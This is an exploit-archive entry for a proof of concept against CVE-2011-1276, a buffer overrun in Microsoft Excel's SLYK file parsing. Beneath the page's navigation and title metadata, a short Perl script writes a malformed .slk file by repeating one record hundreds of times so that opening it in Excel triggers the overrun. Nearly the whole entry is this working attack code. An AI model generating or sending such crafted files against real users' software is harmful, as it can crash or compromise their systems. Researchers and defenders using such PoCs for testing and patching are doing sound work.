[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC
# Published : 2011-08-09
# Author :
# Previous Title : Brother HL-5370DW series auth bypass printer flooder
# Next Title : Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences 0day
# Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC
# Date: [date]
# Author: webDEViL
# Software Link: [download link if available]
# Version: [app version]
# Tested on: ALL
# CVE : CVE-2011-1276
# w3bd3vil[at]gmail[dot]com
# twitter.com/w3bd3vil
open (FILE, '>>CVE-2011-1276.slk');
print FILE "ID;Pn";
print FILE "P;PAAAAn"x550;
print FILE "P";
close (FILE);